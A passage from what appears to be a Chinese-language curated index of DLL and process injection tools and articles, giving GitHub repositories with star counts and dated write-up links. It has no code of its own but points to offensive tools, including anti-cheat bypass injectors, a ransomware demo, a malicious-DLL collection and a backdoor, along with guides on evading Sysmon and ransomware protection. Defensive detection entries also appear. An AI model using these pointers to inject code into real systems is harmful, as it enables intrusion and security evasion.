demonstration of manual dll injector - [**38**ๆ˜Ÿ][26d] [C++] [rolfrolles/wbdeshook](https://github.com/rolfrolles/wbdeshook) DLL-injection based solution to Brecht Wyseur's wbDES challenge (based on SysK's Phrack article) - [**38**ๆ˜Ÿ][2m] [Assembly] [danielkrupinski/inflame](https://github.com/danielkrupinski/inflame) User-mode Windows DLL injector written in Assembly language (FASM syntax) with WinAPI. - [**37**ๆ˜Ÿ][4m] [C++] [nanoric/pkn](https://github.com/nanoric/pkn) pkn game hacking้กน็›ฎๆ ธๅฟƒ๏ผš่ฟ›็จ‹็ฎก็†ใ€ๅ†…ๅญ˜็ฎก็†ๅ’ŒDLLๆณจๅ…ฅ - [**36**ๆ˜Ÿ][7m] [C++] [blole/injectory](https://github.com/blole/injectory) command-line interface dll injector - [**33**ๆ˜Ÿ][3m] [C++] [notscimmy/libinject](https://github.com/notscimmy/libinject) Currently supports injecting signed/unsigned DLLs in 64-bit processes - [**31**ๆ˜Ÿ][4m] [Py] [fullshade/poppopret-nullbyte-dll-bypass](https://github.com/fullshade/poppopret-nullbyte-dll-bypass) ็ป•่ฟ‡ไธ€ไธช็ฉบๅญ—่Š‚ๅœจไธ€ไธชpopp - popp - retnๅœฐๅ€ไธบๅˆฉ็”จๆœฌๅœฐSEHๆบขๅ‡บ้€š่ฟ‡DLLๆณจๅ…ฅ็š„ๆ–นๆณ• - [**30**ๆ˜Ÿ][6m] [C++] [psmitty7373/eif](https://github.com/psmitty7373/eif) Evil Reflective DLL Injection Finder - [**29**ๆ˜Ÿ][4m] [C++] [m-r-j-o-h-n/swh-injector](https://github.com/m-r-j-o-h-n/swh-injector) An Injector that can inject dll into game process protected by anti cheat using SetWindowsHookEx. - [**29**ๆ˜Ÿ][4y] [C++] [stormshield/beholder-win32](https://github.com/stormshield/beholder-win32) A sample on how to inject a DLL from a kernel driver - [**28**ๆ˜Ÿ][4m] [Py] [fullshade/py-memject](https://github.com/fullshade/py-memject) A Windows .DLL injector written in Python - [**27**ๆ˜Ÿ][6m] [HTML] [flyrabbit/winproject](https://github.com/flyrabbit/winproject) Hook, DLLInject, PE_Tool - [**27**ๆ˜Ÿ][4m] [C] [ice3man543/zeusinjector](https://github.com/ice3man543/zeusinjector) An Open Source Windows DLL Injector With All Known Techniques Available - [**27**ๆ˜Ÿ][5y] [C] [olsut/kinject-x64](https://github.com/olsut/kinject-x64) Kinject - kernel dll injector, currently available in x86 version, will be updated to x64 soon. - [**27**ๆ˜Ÿ][5m] [C] [sqdwr/loadimageinject](https://github.com/sqdwr/loadimageinject) LoadImage Routine Inject Dll - [**25**ๆ˜Ÿ][1y] [C#] [enkomio/managedinjector](https://github.com/enkomio/managedinjector) A C# DLL injection library - [**25**ๆ˜Ÿ][6y] [C] [whyallyn/paythepony](https://github.com/whyallyn/paythepony) ไฝฟ็”จๅๅฐ„DLLๆณจๅ…ฅๅบ“ๆณจๅ…ฅๅˆฐ่ฟœ็จ‹่ฟ›็จ‹๏ผŒๅŠ ๅฏ†ๅ’Œ่ฆๆฑ‚ๆ–‡ไปถ็š„่ตŽ้‡‘๏ผŒๅนถ้€ ๆˆๆˆ‘็š„ๅฐ้ฉฌ็–ฏ็‹‚็š„็ณป็ปŸใ€‚ - [**24**ๆ˜Ÿ][2m] [C#] [tmthrgd/dll-injector](https://github.com/tmthrgd/dll-injector) Inject and detour DLLs and program functions both managed and unmanaged in other programs, written (almost) purely in C#. [Not maintained]. - [**21**ๆ˜Ÿ][3y] [C] [al-homedawy/injector](https://github.com/al-homedawy/injector) A Windows driver used to facilitate DLL injection - [**21**ๆ˜Ÿ][5y] [C] [nyx0/dll-inj3cti0n](https://github.com/nyx0/dll-inj3cti0n) Another dll injection tool. - [**21**ๆ˜Ÿ][29d] [C++] [coreyauger/slimhook](https://github.com/coreyauger/slimhook) Demonstration of dll injection. As well loading .net runtime and calling .net code. Example hijacking d3d9 dll and altering rendering of games. - [**17**ๆ˜Ÿ][12m] [C] [strobejb/injdll](https://github.com/strobejb/injdll) DLL Injection commandline utility - [**17**ๆ˜Ÿ][5m] [C#] [cameronaavik/ilject](https://github.com/cameronaavik/ilject) Provides a way which you can load a .NET dll/exe from disk, modify/inject IL, and then run the assembly all in memory without modifying the file. - [**15**ๆ˜Ÿ][2y] [C] [ntraiseharderror/phage](https://github.com/ntraiseharderror/phage) Reflective DLL Injection style process infector - [**15**ๆ˜Ÿ][3y] [C] [portcullislabs/wxpolicyenforcer](https://github.com/portcullislabs/wxpolicyenforcer) Injectable Windows DLL which enforces a W^X memory policy on a process - [**14**ๆ˜Ÿ][4m] [C#] [ulysseswu/vinjex](https://github.com/ulysseswu/vinjex) A simple DLL injection lib using Easyhook, inspired by VInj. - [**13**ๆ˜Ÿ][1y] [C++] [matrix86/wincodeinjection](https://github.com/matrix86/wincodeinjection) Dll Injection and Code injection sample - [**13**ๆ˜Ÿ][4y] [C++] [spl0i7/dllinject](https://github.com/spl0i7/dllinject) Mineweeper bot by DLL Injection - [**12**ๆ˜Ÿ][4m] [C++] [sherazibrahim/dll-injector](https://github.com/sherazibrahim/dll-injector) ไธ€ไธชdllๆณจๅ…ฅๅ™จ - [**11**ๆ˜Ÿ][9m] [C#] [ihack4falafel/dll-injection](https://github.com/ihack4falafel/dll-injection) C# program that takes process id and path to DLL payload to perform DLL injection method. - [**9**ๆ˜Ÿ][18d] [C++] [pfussell/pivotal](https://github.com/pfussell/pivotal) A MITM proxy server for reflective DLL injection through WinINet - [**9**ๆ˜Ÿ][9m] [C] [userexistserror/injectdll](https://github.com/userexistserror/injectdll) Inject a Dll from memory - [**9**ๆ˜Ÿ][1y] [Assembly] [dentrax/dll-injection-with-assembly](https://github.com/dentrax/dll-injection-with-assembly) DLL Injection to Exe with Assembly using OllyDbg - [**7**ๆ˜Ÿ][1y] [C] [haidragon/newinjectdrv](https://github.com/haidragon/newinjectdrv) APCๆณจๅ…ฅDLLๅ†…ๆ ธๅฑ‚ - [**6**ๆ˜Ÿ][2y] [thesph1nx/covenant](https://github.com/thesph1nx/covenant) Metepreter clone - DLL Injection Backdoor - [**5**ๆ˜Ÿ][5y] [C++] [ciantic/remotethreader](https://github.com/ciantic/remotethreader) Helps you to inject your dll in another process - [**5**ๆ˜Ÿ][4m] [C++] [reclassnet/reclass.net-memorypipeplugin](https://github.com/reclassnet/reclass.net-memorypipeplugin) A ReClass.NET plugin which allows direct memory access via dll injection. - [**1**ๆ˜Ÿ][1y] [PS] [getrektboy724/maldll](https://github.com/getrektboy724/maldll) A bunch of malicius dll to inject to a process *** ## <a id="f69bdae6414fe41f7b2ff0a5ae646e0e"></a>ๆ–‡็ซ  - 2020.02 [0x00sec] [DLL injections (safety)](https://0x00sec.org/t/dll-injections-safety/19496) - 2019.08 [tyranidslair] [Windows Code Injection: Bypassing CIG Through KnownDlls](https://www.tiraniddo.dev/2019/08/windows-code-injection-bypassing-cig.html) - 2019.08 [tyranidslair] [Windows Code Injection: Bypassing CIG Through KnownDlls](https://tyranidslair.blogspot.com/2019/08/windows-code-injection-bypassing-cig.html) - 2019.03 [code610] [DLL Injection - part 2](https://code610.blogspot.com/2019/03/dll-injection-part-2.html) - 2018.10 [pediy] [[ๅŽŸๅˆ›]ไปฃๆ›ฟๅˆ›ๅปบ็”จๆˆท็บฟ็จ‹ไฝฟ็”จShellCodeๆณจๅ…ฅDLL็š„ๅฐๆŠ€ๅทง](https://bbs.pediy.com/thread-247515.htm) - 2018.10 [4hou] [ๅฆ‚ไฝ•ๅˆฉ็”จDLLๆณจๅ…ฅ็ป•่ฟ‡Win10ๅ‹’็ดข่ฝฏไปถไฟๆŠค](http://www.4hou.com/technology/13923.html) - 2018.10 [0x00sec] [Reflective Dll Injection - Any Way to check If a process is already injected?](https://0x00sec.org/t/reflective-dll-injection-any-way-to-check-if-a-process-is-already-injected/8980/) - 2018.09 [pediy] [[ๅŽŸๅˆ›]win10_arm64 ้ฉฑๅŠจๆณจๅ…ฅdll ๅˆฐ arm32็จ‹ๅบ](https://bbs.pediy.com/thread-247032.htm) - 2018.09 [code610] [DLL Injection - part 1](https://code610.blogspot.com/2018/09/dll-injection-part-1.html) - 2018.08 [freebuf] [sRDI๏ผšไธ€ๆฌพ้€š่ฟ‡Shellcodeๅฎž็Žฐๅๅฐ„ๅž‹DLLๆณจๅ…ฅ็š„ๅผบๅคงๅทฅๅ…ท](http://www.freebuf.com/sectool/181426.html) - 2018.08 [vkremez] [Let's Learn: Dissecting Panda Banker & Modules: Webinject, Grabber & Keylogger DLL Modules](https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html) - 2018.07 [4hou] [ๆณจๅ…ฅ็ณปๅˆ—โ€”โ€”DLLๆณจๅ…ฅ](http://www.4hou.com/technology/12703.html) - 2018.06 [0x00sec] [Reflective DLL Injection - AV detects at runtime](https://0x00sec.org/t/reflective-dll-injection-av-detects-at-runtime/7307/) - 2018.06 [qq] [ใ€ๆธธๆˆๆผๆดžใ€‘ๆณจๅ…ฅDLLๆ˜พ็คบๆธธๆˆ็ช—ๅฃ](http://gslab.qq.com/article-508-1.html) - 2018.06 [pediy] [[ๅŽŸๅˆ›]่ฟœ็จ‹ๆณจๅ…ฅไน‹dllๆจกๅ—ๆทฑๅบฆ้š่—](https://bbs.pediy.com/thread-228710.htm) - 2018.02 [pediy] [[ๆฑ‚ๅŠฉ]ๅ†…ๅญ˜dll็š„่ฟœ็จ‹็บฟ็จ‹ๆณจๅ…ฅ๏ผŒๅฆ‚ไฝ•ไฝฟ็”จMemoryModuleๅผ€ๆบๅบ“๏ผŸ](https://bbs.pediy.com/thread-224489.htm) - 2017.12 [secist] [Mavinject | Dll Injected](http://www.secist.com/archives/5912.html) - 2017.12 [secvul] [SSM็ปˆ็ป“dllๆณจๅ…ฅ](https://secvul.com/topics/951.html) - 2017.10 [nsfocus] [ใ€ๅนฒ่ดงๅˆ†ไบซใ€‘SandboxๆŠ€ๆœฏไน‹DLLๆณจๅ…ฅ](http://blog.nsfocus.net/sandbox-technology-dll-injection/) - 2017.10 [freebuf] [DLLๆณจๅ…ฅๆ–ฐๅงฟๅŠฟ๏ผšๅๅฐ„ๅผDLLๆณจๅ…ฅ็ ”็ฉถ](http://www.freebuf.com/articles/system/151161.html) - 2017.10 [pediy] [[ๅŽŸๅˆ›]้€š่ฟ‡Wannacryๅˆ†ๆžๅ†…ๆ ธshellcodeๆณจๅ…ฅdllๆŠ€ๆœฏ](https://bbs.pediy.com/thread-221756.htm) - 2017.09 [360] [ๅˆฉ็”จDLLๅปถ่ฟŸๅŠ ่ฝฝๅฎž็Žฐ่ฟœ็จ‹ไปฃ็ ๆณจๅ…ฅ](https://www.anquanke.com/post/id/86919/) - 2017.09 [360] [Dllๆณจๅ…ฅๆ–ฐๅงฟๅŠฟ๏ผšSetThreadContextๆณจๅ…ฅ](https://www.anquanke.com/post/id/86786/) - 2017.08 [silentbreaksecurity] [sRDI โ€“ Shellcode Reflective DLL Injection](https://silentbreaksecurity.com/srdi-shellcode-reflective-dll-injection/) - 2017.08 [360] [DLLๆณจๅ…ฅ้‚ฃไบ›ไบ‹](https://www.anquanke.com/post/id/86671/) - 2017.08 [freebuf] [็ณป็ปŸๅฎ‰ๅ…จๆ”ป้˜ฒๆˆ˜๏ผšDLLๆณจๅ…ฅๆŠ€ๆœฏ่ฏฆ่งฃ](http://www.freebuf.com/articles/system/143640.html) - 2017.08 [pediy] [[็ฟป่ฏ‘]ๅคš็งDLLๆณจๅ…ฅๆŠ€ๆœฏๅŽŸ็†ไป‹็ป](https://bbs.pediy.com/thread-220405.htm) - 2017.07 [0x00sec] [Reflective DLL Injection](https://0x00sec.org/t/reflective-dll-injection/3080/) - 2017.07 [zerosum0x0] [ๅˆฉ็”จ SetThreadContext() ๅ’Œ NtContinue() ๅฎž็Žฐๅๅฐ„ DLL ๅŠ ่ฝฝ](https://zerosum0x0.blogspot.com/2017/07/threadcontinue-reflective-injection.html) - 2017.07 [zerosum0x0] [Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection](https://zerosum0x0.blogspot.com/2017/06/proposed-eafemet-bypass-for-reflective.html) - 2017.05 [360] [NSAๆญฆๅ™จๅบ“๏ผšDOUBLEPULSAR็š„ๅ†…ๆ ธDLLๆณจๅ…ฅๆŠ€ๆœฏ](https://www.anquanke.com/post/id/86137/) - 2017.05 [lallouslab] [7 DLL injection techniques in Microsoft Windows](http://lallouslab.net/2017/05/15/7-dll-injection-techniques-in-the-microsoft-windows/) - 2017.05 [3or] [mimilib DHCP Server Callout DLL injection](https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html) - 2017.05 [3or] [Hunting DNS Server Level Plugin dll injection](https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html) - 2017.04 [arvanaghi] [DLL Injection Using LoadLibrary in C](https://arvanaghi.com/blog/dll-injection-using-loadlibrary-in-C/) - 2017.04 [4hou] [้€š่ฟ‡APCๅฎž็ŽฐDllๆณจๅ…ฅโ€”โ€”็ป•่ฟ‡Sysmon็›‘ๆŽง](http://www.4hou.com/technology/4393.html) - 2017.04 [bogner] [CVE-2017-3511: Code Injection through DLL Sideloading in 64bit Oracle Java](https://bogner.sh/2017/04/cve-2017-3511-code-injection-through-dll-sideloading-in-64bit-oracle-java/) - 2017.04 [countercept] [Analyzing the DOUBLEPULSAR Kernel DLL Injection Technique](https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/) - 2017.04 [countercept] [NSAๆญฆๅ™จๅบ“๏ผšDOUBLEPULSAR็š„ๅ†…ๆ ธDLLๆณจๅ…ฅๆŠ€ๆœฏ](https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/) - 2017.04 [3gstudent] [้€š่ฟ‡APCๅฎž็ŽฐDllๆณจๅ…ฅโ€”โ€”็ป•่ฟ‡Sysmon็›‘ๆŽง](https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E%E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7/) - 2017.04 [pentestlab] [DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/) - 2017.03 [pediy] [[ๅŽŸๅˆ›]ไธ็”จๅฏผๅ‡บไปปไฝ•ๅ‡ฝๆ•ฐ็š„DLLๅŠซๆŒๆณจๅ…ฅ,ๅฎŒ็พŽ!](https://bbs.pediy.com/thread-216348.htm) - 2016.06 [lowleveldesign] [!injectdll โ€“ a remote threadย approach](https://lowleveldesign.org/2016/06/27/injectdll-a-remote-thread-approach/) - 2016.06 [lowleveldesign] [!injectdll โ€“ a WinDbg extension for DLLย injection](https://lowleveldesign.org/2016/06/22/injectdll-a-windbg-extension-for-dll-injection/) - 2016.04 [ketansingh] [Hacking games with DLL Injection](https://ketansingh.net/hacking-games-with-dll-injection/) - 2016.02 [freebuf] [้€š่ฟ‡ DLL ๆณจๅ…ฅๅ’Œไปฃ็ ไฟฎๆ”น็ป•่ฟ‡ XIGNCODE3 ็š„ๅไฝœๅผŠไฟๆŠค](http://www.freebuf.com/articles/terminal/96741.html) - 2016.01 [freebuf] [DLLๆณจๅ…ฅ็š„ๅ‡ ็งๅงฟๅŠฟ๏ผˆไบŒ๏ผ‰๏ผšCreateRemoteThread And More](http://www.freebuf.com/articles/system/94693.html) - 2016.01 [freebuf] [DLLๆณจๅ…ฅ็š„ๅ‡ ็งๅงฟๅŠฟ๏ผˆไธ€๏ผ‰๏ผšWindows Hooks](http://www.freebuf.com/articles/system/93413.html) - 2015.11 [modexp] [DLL/PIC Injection on Windows from Wow64ย process](https://modexp.wordpress.com/2015/11/19/dllpic-injection-on-windows-from-wow64-process/) - 2015.09 [pediy] [[ๅŽŸๅˆ›]c++ ่ฝฝๅ…ฅๅ†…ๅญ˜ไธญdll ,ไปฅๅŠๅ†…ๅญ˜ๆณจๅ…ฅ (ๅทฒๅผ€ๆบ)](https://bbs.pediy.com/thread-203894.htm) - 2015.08 [rapid7] [Using Reflective DLL Injection to exploit IE Elevation Policies](https://blog.rapid7.com/2015/08/28/using-reflective-dll-injection-to-exploit-ie-elevation-policies/) - 2015.07 [pediy] [[ๅŽŸๅˆ›]ไปŠๅคฉๅ†™ไบ†ไธชapcๆณจๅ…ฅdllไปฃ็ ๏ผŒๅฏไปฅๅฝ“ๅทฅๅ…ทไฝฟ็”จ](https://bbs.pediy.com/thread-202078.htm) - 2015.05 [codereversing] [Debugging Injected DLLs](http://www.codereversing.com/blog/archives/219) - 2015.05 [WarrantyVoider] [DAI dll injection test - successfull](https://www.youtube.com/watch?v=hYU_W1gRtZE) - 2015.04 [securestate] [DLL Injection Part 2: CreateRemoteThread and More](https://warroom.securestate.com/dll-injection-part-2-createremotethread-and-more/) - 2015.03 [securestate] [DLL Injection Part 1: SetWindowsHookEx](https://warroom.rsmus.com/dll-injection-part-1-setwindowshookex/) - 2015.03 [securestate] [DLL Injection Part 0: Understanding DLL Usage](https://warroom.rsmus.com/dll-injection-part-0-understanding-dll-usage/) - 2014.10 [codingvision] [C# Inject a Dll into a Process (w/ CreateRemoteThread)](http://codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread) - 2014.04 [pediy] [[ๅˆ†ไบซ]้‡่ฏป่€ๆ–‡็ซ ๏ผšDLLๆณจๅ…ฅ็š„ๅˆไธ€ไธชๆข—](https://bbs.pediy.com/thread-186778.htm) - 2014.04 [pediy] [[ๅˆ†ไบซ]่€ๆ–‡็ซ ็ณปๅˆ—๏ผšAPCๆณจๅ…ฅDLL็š„ๆข—](https://bbs.pediy.com/thread-186631.htm) - 2014.03 [trustwave] [Old School Code Injection in an ATM .dll](https://www.trustwave.com/Resources/SpiderLabs-Blog/Old-School-Code-Injection-in-an-ATM--dll/) - 2014.01 [osandamalith] [Ophcrack Path Subversion Arbitrary DLL Injection Codeย Execution](https://osandamalith.com/2014/01/18/ophcrack-path-subversion-arbitrary-dll-injection-code-execution/) - 2013.12 [pediy] [[ๅŽŸๅˆ›]DLL่‡ชๅธ่ฝฝๆ— ๆจกๅ—ๆณจๅ…ฅๆบ็ (ไธ€)](https://bbs.pediy.com/thread-182069.htm) - 2013.09 [debasish] [Inline API Hooking using DLL Injection](http://www.debasish.in/2013/09/inline-api-hooking-using-dll-injection.html) - 2013.09 [freebuf] [ๅฏนๅ›ฝๅ†…ๅ„็งๅฎ‰ๅ…จๅซๅฃซไบงๅ“็š„ไธ€็ง้€š็”จ่™ๆ€ใ€DLLๆณจๅ…ฅใ€ๆœฌๅœฐไปฃ็ ๆ‰ง่กŒ็š„ๆ–นๆณ•](http://www.freebuf.com/vuls/12597.html) - 2013.08 [pediy] [[ๅŽŸๅˆ›]้‡ๆธฉ่ฟœ็จ‹ๆณจๅ…ฅ-------ๆ— dll](https://bbs.pediy.com/thread-176702.htm) - 2013.06 [msreverseengineering] [What is DLL Injection and How is it used for Reverse Engineering?](http://www.msreverseengineering.com/blog/2014/6/23/what-is-dll-injection-and-how-is-it-used-for-reverse-engineering) - 2013.05 [pediy] [[ๅŽŸๅˆ›]ๅ…ณไบŽdllๆณจๅ…ฅๆ–นๆณ•](https://bbs.pediy.com/thread-171190.htm) - 2013.03 [pediy] [[ๅŽŸๅˆ›]DLLๆณจๅ…ฅไน‹่ฟœ็บฟ็จ‹ๆ–นๅผ](https://bbs.pediy.com/thread-167175.htm) - 2013.02 [pediy] [[ๅŽŸๅˆ›]ๆ˜“่ฏญ่จ€้™ๆ€็ผ–่ฏ‘็š„DLLๆณจๅ…ฅๅˆฐๅ…ถไป–่ฏญ่จ€ๅ†™็š„EXEไธญๅŽ็š„ๅฎŒ็พŽๅธ่ฝฝ](https://bbs.pediy.com/thread-162742.htm) - 2012.10 [octopuslabs] [DLL Injection โ€“ A Splash Bitmap](http://octopuslabs.io/legend/blog/archives/1785) - 2012.09 [debasish] [KeyLogging through DLL Injection[The Simplest Way]](http://www.debasish.in/2012/09/keylogging-through-dll-injectionthe.html) - 2012.09 [volatility] [MoVP 2.1 Atoms (The New Mutex), Classes and DLL Injection](https://volatility-labs.blogspot.com/2012/09/movp-21-atoms-new-mutex-classes-and-dll.html) - 2012.06 [freebuf] [[ๆ›ดๆ–ฐ]ไธ€ๆฌพ้žๅธธไธ้”™็š„dllๆณจๅ…ฅๅ™จ โ€“ RemoteDLL V2](http://www.freebuf.com/sectool/3970.html) - 2012.05 [brindi] [DLL and Code Injection in Python](http://brindi.si/g/blog/dll-and-code-injection-in-python.html) - 2011.11 [pediy] [[ๅŽŸๅˆ›]ๆปดๆฐด้€†ๅ‘ๅญฆไน ๆ”ถ่Žท1-ๅŒ่ฟ›็จ‹ๆ— dllๆณจๅ…ฅ๏ผˆ1ๆฅผ๏ผŒ17ๆฅผ๏ผŒ21ๆฅผ๏ผŒ27ๆฅผ๏ผŒ30ๆฅผ๏ผŒ33ๆฅผ๏ผ‰[ๅทฒๆ›ดๆ–ฐ่‡ณ33ๆฅผ]](https://bbs.pediy.com/thread-142554.htm) - 2011.06 [pediy] [[ๅŽŸๅˆ›]ๅˆฉ็”จ้’ฉๅญๅ‡ฝๆ•ฐๆฅๆณจๅ…ฅDLL็š„ไธ€ไธชๅ…ทไฝ“ๅบ”็”จ๏ผš็‚นๅ‡ปๆกŒ้ขไธๅŒๅ›พๆ ‡๏ผŒๆ’ญๆ”พ็›ธๅบ”้Ÿณ็ฌฆ](https://bbs.pediy.com/thread-136144.htm) - 2011.01 [pediy] [[ๅŽŸๅˆ›]่ฟ›็จ‹็ฎก็†dllๆณจๅ…ฅ็ปผๅˆๅฐๅทฅๅ…ท[้™„ๆบ็ ]](https://bbs.pediy.com/thread-127924.htm) - 2010.12 [pediy] [[ๅŽŸๅˆ›]Ring3ไธ‹ๅŠซๆŒCreateProcessๆณจๅ…ฅdll](https://bbs.pediy.com/thread-126226.htm) - 2010.01 [pediy] [[ๅŽŸๅˆ›]dllๆณจๅ…ฅ่พ…ๅŠฉๅทฅๅ…ท[ๅธฆๆบ็ ]](https://bbs.pediy.com/thread-104642.htm) - 2009.08 [pediy] [[ๅŽŸๅˆ›]ๆœ€็ฎ€ๅ•็š„DLLๆณจๅ…ฅ](https://bbs.pediy.com/thread-94799.htm) - 2009.07 [pediy] [[ๅŽŸๅˆ›]ๆณจๅ…ฅDLLไน‹ANSI็‰ˆ--ๆ”น่‡ชJeffrey็š„ใ€Šwindowsๆ ธๅฟƒ็ผ–็จ‹ใ€‹](https://bbs.pediy.com/thread-92631.htm) - 2009.04 [pediy] [ไธ้œ€่ฆไพ่ต–dllmain่งฆๅ‘็š„CEๆณจๅ…ฅไปฃ็ ](https://bbs.pediy.com/thread-85899.htm) - 2008.12 [pediy] [[ๅŽŸๅˆ›][ไปฃ็จ‹]่ฟœ็จ‹็บฟ็จ‹่ฏฆ่งฃ(ไธ€):ๆ— DLL่ฟœ็จ‹็บฟ็จ‹ๆณจๅ…ฅ](https://bbs.pediy.com/thread-78032.htm) - 2008.11 [sans] [Finding stealth injected DLLs](https://isc.sans.edu/forums/diary/Finding+stealth+injected+DLLs/5356/) - 2008.11 [pediy] [[ๅŽŸๅˆ›]N็งๅ†…ๆ ธๆณจๅ…ฅDLL็š„ๆ€่ทฏๅŠๅฎž็Žฐ](https://bbs.pediy.com/thread-75887.htm) - 2008.10 [pediy] [[ๅŽŸๅˆ›]IAT HOOK ไปฃ็ ๆณจๅ…ฅ้žDLL](https://bbs.pediy.com/thread-74569.htm) - 2008.03 [pediy] [[็Œฎไธ‘]Win32ๆฑ‡็ผ–ๅฎž็ŽฐDLL็š„่ฟœ็จ‹ๆณจๅ…ฅๅŠๅธ่ฝฝ](https://bbs.pediy.com/thread-60763.htm) - 2007.12 [pediy] [[ๅŽŸๅˆ›]QueueUserApcๅฎž็ŽฐDLLๆณจๅ…ฅ](https://bbs.pediy.com/thread-56071.htm) - 2006.11 [pediy] [ๅ†่ฐˆDllๆณจๅ…ฅNetTransport 2.25.337[ๅŽŸๅˆ›]](https://bbs.pediy.com/thread-35556.htm) - 2006.10 [pediy] [[ๅŽŸๅˆ›]Dllๆณจๅ…ฅNetTransport 2.25.337](https://bbs.pediy.com/thread-34096.htm) - 2005.08 [pediy] [ApiHook๏ผŒInjectDll ๅ•ๅ…ƒๅŠๅ…ถๅบ”็”จ [Delphiไปฃ็ ]](https://bbs.pediy.com/thread-16088.htm) # <a id="97ceb80739f1d2efce08baaf98dce0fc"></a>่ฟ›็จ‹ๆณจๅ…ฅ *** ## <a id="5ed3d284b106ffdc141f447f59326b00"></a>ๅทฅๅ…ท - [**2389**ๆ˜Ÿ][10d] [Py] [lmacken/pyrasite](https://github.com/lmacken/pyrasite) ๅ‘่ฟ่กŒไธญ็š„ Python่ฟ›็จ‹ๆณจๅ…ฅไปฃ็  - [**1568**ๆ˜Ÿ][17d] [Py] [google/pyringe](https://github.com/google/pyringe) Python่ฐƒ่ฏ•ๅ™จ๏ผŒๅฏ้™„ๅŠ Python่ฟ›็จ‹ๅนถๅ‘ๅ…ถไธญๆณจๅ…ฅไปฃ็  - [**1486**ๆ˜Ÿ][3m] [C] [rikkaapps/riru](https://github.com/rikkaapps/riru) ้€š่ฟ‡ๆ›ฟๆขlibmemtrackๆณจๅ…ฅๅˆๅญ่ฟ›็จ‹ - [**899**ๆ˜Ÿ][1y] [C++] [secrary/injectproc](https://github.com/secrary/injectproc) ๅคš็งDLLๆณจๅ…ฅใ€่ฟ›็จ‹ๆ›ฟๆขใ€Hookๆณจๅ…ฅใ€APCๆณจๅ…ฅ็š„ๅฎž็Žฐ - [**655**ๆ˜Ÿ][4y] [C] [rentzsch/mach_inject](https://github.com/rentzsch/mach_inject) Mac OS X็š„่ฟ›็จ‹้—ดไปฃ็ ๆณจๅ…ฅ - [**589**ๆ˜Ÿ][14d] [C] [gaffe23/linux-inject](https://github.com/gaffe23/linux-inject) Tool for injecting a shared object into a Linux process - [**536**ๆ˜Ÿ][13d] [C] [odzhan/injection](https://github.com/odzhan/injection) Windows process injection methods - [**435**ๆ˜Ÿ][11d] [Py] [davidbuchanan314/dlinject](https://github.com/davidbuchanan314/dlinject) Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace - [**413**ๆ˜Ÿ][4y] [C#] [zenlulz/memorysharp](https://github.com/zenlulz/memorysharp) Windows็จ‹ๅบๅ†…ๅญ˜็ผ–่พ‘ๅบ“๏ผŒC#็ผ–ๅ†™๏ผŒๅฏๅ‘่ฟœ็จ‹่ฟ›็จ‹ๆณจๅ…ฅ่พ“ๅ…ฅๅ’Œไปฃ็ ๏ผŒๆˆ–่ฏปๅ–่ฟœ็จ‹่ฟ›็จ‹ๅ†…ๅญ˜ - [**381**ๆ˜Ÿ][14d] [C++] [evilsocket/arminject](https://github.com/evilsocket/arminject) An application to dynamically inject a shared object into a running process on ARM architectures. - [**376**ๆ˜Ÿ][12d] [C++] [theevilbit/injection](https://github.com/theevilbit/injection) various process injection technique - [**363**ๆ˜Ÿ][4m] [C++] [safebreach-labs/pinjectra](https://github.com/safebreach-labs/pinjectra) ไธ€ไธชๅฎž็Žฐ่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏ็š„็ฑปC/ c++็ฑปๆ“ไฝœ็ณป็ปŸๅบ“(ไธป่ฆๅ…ณๆณจWindows 10 64ไฝ) - [**362**ๆ˜Ÿ][4m] [C#] [rasta-mouse/tikitorch](https://github.com/rasta-mouse/tikitorch) Process Injection - [**294**ๆ˜Ÿ][26d] [C] [quarkslab/quarkspwdump](https://github.com/quarkslab/quarkspwdump) Dump various types of Windows credentials without injecting in any process. - [**267**ๆ˜Ÿ][2y] [C++] [chadski/sharpneedle](https://github.com/chadski/sharpneedle) Inject C# code into a running process - [**246**ๆ˜Ÿ][16d] [C] [suvllian/process-inject](https://github.com/suvllian/process-inject) ๅœจWindows็Žฏๅขƒไธ‹็š„่ฟ›็จ‹ๆณจๅ…ฅๆ–นๆณ•๏ผš่ฟœ็จ‹็บฟ็จ‹ๆณจๅ…ฅใ€ๅˆ›ๅปบ่ฟ›็จ‹ๆŒ‚่ตทๆณจๅ…ฅใ€ๅๅฐ„ๆณจๅ…ฅใ€APCInjectใ€SetWindowHookEXๆณจๅ…ฅ - [**204**ๆ˜Ÿ][4y] [C] [dismantl/linux-injector](https://github.com/dismantl/linux-injector) Utility for injecting executable code into a running process on x86/x64 Linux - [**163**ๆ˜Ÿ][1m] [C] [dhavalkapil/libdheap](https://github.com/dhavalkapil/libdheap) ๅฏไปฅ้€ๆ˜Žๅœฐๆณจๅ…ฅๅˆฐไธๅŒ่ฟ›็จ‹็š„ๅ…ฑไบซ(ๅŠจๆ€)ๅบ“๏ผŒไปฅๆฃ€ๆต‹glibcๅ †ไธญ็š„ๅ†…ๅญ˜ๆŸๅ - [**157**ๆ˜Ÿ][9m] [C] [hasherezade/process_doppelganging](https://github.com/hasherezade/process_doppelganging) ่ฟ›็จ‹ๆณจๅ…ฅๆŠ€ๆœฏ Process Doppelganging ็š„ๅฎž็Žฐไปฃ็  - [**154**ๆ˜Ÿ][1m] [C] [ixty/mandibule](https://github.com/ixty/mandibule) ๅ‘่ฟœ็จ‹่ฟ›็จ‹ๆณจๅ…ฅELFๆ–‡ไปถ - [**144**ๆ˜Ÿ][4m] [PS] [empireproject/psinject](https://github.com/empireproject/psinject) Inject PowerShell into any process - [**142**ๆ˜Ÿ][4m] [C#] [3xpl01tc0d3r/processinjection](https://github.com/3xpl01tc0d3r/processinjection) This program is designed to demonstrate various process injection techniques - [**142**ๆ˜Ÿ][4m] [C] [antoniococo/mapping-injection](https://github.com/antoniococo/mapping-injection) Just another Windows Process Injection - 